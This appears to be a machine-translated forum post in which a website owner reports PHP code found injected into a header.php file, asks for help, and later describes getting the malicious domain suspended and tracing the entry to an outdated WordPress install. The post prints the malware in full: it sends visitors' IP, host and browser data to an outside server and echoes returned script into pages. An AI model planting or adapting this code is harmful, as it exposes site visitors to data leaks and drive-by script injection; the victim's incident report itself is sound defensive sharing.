Avast偶尔会出现在我的一个网站上.有点奇怪,因为我对安全性非常严格,但我检查了index.php文件和所有相关的包含和脚本.在我删除的"header.php"文件中找到了一些奇怪的PHP代码.
今晚,avast再次出现,尽管我的FTP数据显示该文件"自我修复后仍未编辑",但代码仍在那里.我现在已经更改了密码和所有内容.
这是有问题的PHP代码,任何建议都会对这是多么好!
<?php
$wp_bskr = 'inf';
$wp_tcc = 'template';
error_reporting(0);
ini_set('display_errors',0);
$wp_hrmr = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_hrmr) && !preg_match ('/bot/i', $wp_hrmr))) {
$wp_drss="http://".$wp_tcc.$wp_bskr.".com/".$wp_bskr."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_hrmr);
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_drss);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_wvw = curl_exec ($ch);
curl_close($ch);
}
if ( substr($wp_wvw,1,3) === 'scr' ) {
echo $wp_wvw;
}
?>
*********更新************
感谢esqew更深入地研究这个并在您的博客文章中提供详细信息.可怕的东西确实.在我的最后得到了一些更新.
首先,使用avast日志(从我的网站检测到有恶意软件时),通过谷歌进行一些搜索,我发现了另一个非常相似的代码示例,并且我的终端上的avast标记的IP地址与此帖子相匹配.这里提供了一些信息来缩小范围:恶意软件 - 流量分析.n*t/2014/05/11/index.html.无论如何,我认为那是帖子.论坛的新手,不确定我是否可以发布链接,所以我已经出演了"net"tld.
从那里,我拿了匹配的IP,一个包含javascript的url,whois'd并将所有信息传递给注册商.他们从他们的结尾看了一眼,并确认有恶意事件发生在我的惊讶之中,在一小时内回复并暂停了域名并且所有人都连接到了这个IP.
其次,我的webhost发现他们认为泄漏是如何实现的.在没有给出完整的详细信息的情况下,我意识到我有一个旧的wordpress安装(旧的我的意思是,我多年没有使用和忘记的一个,自2010年以来没有更新,所以我认为容易受到攻击).从他们的日志看起来,这似乎是我的服务器的方式,因为我没有安装其他脚本.几天前,我更改了所有密码并完全删除了WP,因为它已不再使用,目前看来还不错.